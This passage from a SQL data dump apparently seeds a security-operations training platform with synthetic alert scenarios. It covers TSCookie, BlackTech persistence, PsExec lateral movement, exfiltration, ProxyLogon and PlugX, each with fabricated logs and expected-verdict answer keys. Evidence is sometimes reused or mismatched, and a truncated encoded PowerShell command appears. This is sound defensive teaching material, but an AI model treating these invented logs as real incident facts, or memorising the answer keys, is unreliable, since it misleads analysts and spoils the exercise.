Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, 
NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1183, 'TSCookie Malware Execution Identified', 'high', 'Endpoint Detection and Response (EDR) logs', 'The TSCookie malware has been executed on an endpoint, potentially allowing the attacker to deploy malicious scripts and deepen infiltration into the network.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T08:45:23Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"185.234.217.211\",\"destination_ip\":\"10.0.0.15\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\wscript.exe\",\"file_name\":\"TSCookieLoader.js\",\"file_hash\":\"3f6e5b7a8b9c3d4e5f6a7b8c9d0e1f2a\",\"action\":\"execute\",\"status\":\"success\"}', '2026-02-07 21:22:16', '2026-02-22 20:41:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.234.217.211\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"TSCookieLoader.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"JavaScript file associated with TSCookie malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f6e5b7a8b9c3d4e5f6a7b8c9d0e1f2a\",\"is_critical\":true,\"osint_result\":{\"source\":\"HashLookup\",\"verdict\":\"malicious\",\"details\":\"File hash linked to TSCookie malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, 
NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1184, 'Persistence Mechanism Activated', 'high', 'System configuration logs', 'BlackTech has modified critical system configurations to maintain persistent access. A backdoor was embedded to withstand potential system reboots or updates.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T10:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.25.5\",\"user\":\"jdoe_admin\",\"action\":\"Registry Key Modification\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backdoor\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"backdoor.exe\",\"event_status\":\"Success\"}', '2026-02-07 21:22:16', '2026-02-23 11:11:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with BlackTech APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.25.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account with recent unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with backdoor functionality.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Executable known to be used in 
persistence mechanisms by BlackTech.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key 
Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1185, 'Unauthorized Lateral Movement Detected', 'high', 'Lateral movement detection tool', 'BlackTech is utilizing stolen credentials and network mapping to move laterally across the compromised network. They aim to expand their control and access restricted areas.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T10:23:45Z\",\"event_id\":\"LM123456\",\"source_ip\":\"185.92.220.25\",\"destination_ip\":\"10.5.16.7\",\"source_user\":\"jdoe\",\"destination_user\":\"admin\",\"used_credentials\":\"jdoe@corporate.local\",\"network_protocol\":\"SMB\",\"operation\":\"access\",\"file_accessed\":\"\\\\\\\\10.5.16.7\\\\sensitive_share\\\\confidential.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"tools_used\":[\"PsExec.exe\"],\"notes\":\"Suspicious lateral movement detected. PsExec used to access sensitive share.\"}', '2026-02-07 21:22:16', '2026-02-22 20:46:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with BlackTech APT.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.5.16.7\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server being accessed.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"PsExec.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"PsExec is commonly used for lateral 
movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. 
PsExec used to access sensitive share.\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. PsExec used to access sensitive share.\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. 
PsExec used to access sensitive share.\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. PsExec used to access sensitive share.\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. PsExec used to access sensitive share.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1186, 'Data Exfiltration Attempt Discovered', 'high', 'Data Loss Prevention (DLP) tool', 'In the final stage of their operation, BlackTech attempts to exfiltrate valuable data, including intellectual property and confidential communications, signaling the culmination of their espionage activities. The DLP tool detected abnormal data transfer attempts towards an external IP address associated with known threat actors.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:35:23Z\",\"event_id\":\"DLPEX1234567\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"confidential_strategy.docx\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"reason\":\"Data exfiltration attempt detected\",\"external_ip_reputation\":\"malicious\"}', '2026-02-07 21:22:16', '2026-02-22 20:43:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Associated with known threat actor BlackTech\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_strategy.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_documentation\",\"verdict\":\"suspicious\",\"details\":\"Sensitive internal document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Document hash not recognized in safe 
database\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt 
detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1187, 'Initial Access via ProxyLogon Exploit', 'critical', 'Network Intrusion Detection System (NIDS)', 'The Calypso APT group has exploited an unpatched ProxyLogon vulnerability in order to gain initial access to government email servers. This activity was detected by the NIDS as the group initiated exploitation attempts from a known malicious IP address, aiming to establish a foothold for further intrusion.', 'Exploitation', 'T1190 - Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:32:45Z\",\"event_type\":\"exploitation_attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"exploit\":\"ProxyLogon\",\"malware_hash\":\"3d2e478f323a7b0f2b9f5a6d7e8f9c10\",\"associated_filename\":\"malicious_payload.exe\",\"target_user\":\"admin@governmentagency.gov\",\"protocol\":\"HTTPS\",\"nids_rule_id\":\"1001\"}', '2026-02-07 21:23:06', '2026-02-15 04:19:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT campaigns, including ProxyLogon exploitation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Assets\",\"verdict\":\"internal\",\"details\":\"Internal government email server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e478f323a7b0f2b9f5a6d7e8f9c10\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payload used by Calypso APT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in ProxyLogon exploitation 
attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin@governmentagency.gov\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate email user targeted by exploitation attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1188, 'Deploying PlugX Malware', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, the threat actors deploy a variant of PlugX malware, which allows for remote command execution and control.', 'Malware Execution', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_id\":\"evt-5682\",\"event_type\":\"malware_execution\",\"user\":\"jdoe\",\"host\":\"WIN-7K3J4M6\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"filename\":\"plugx_loader.exe\",\"file_hash\":\"3f8a72d8b6b9c3b9f0a2a1b7b8c1c9d8\",\"process_id\":4729,\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\plugx_loader.exe\",\"parent_process\":\"explorer.exe\",\"malware_family\":\"PlugX\"}', '2026-02-07 21:23:06', '2026-02-22 18:24:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised 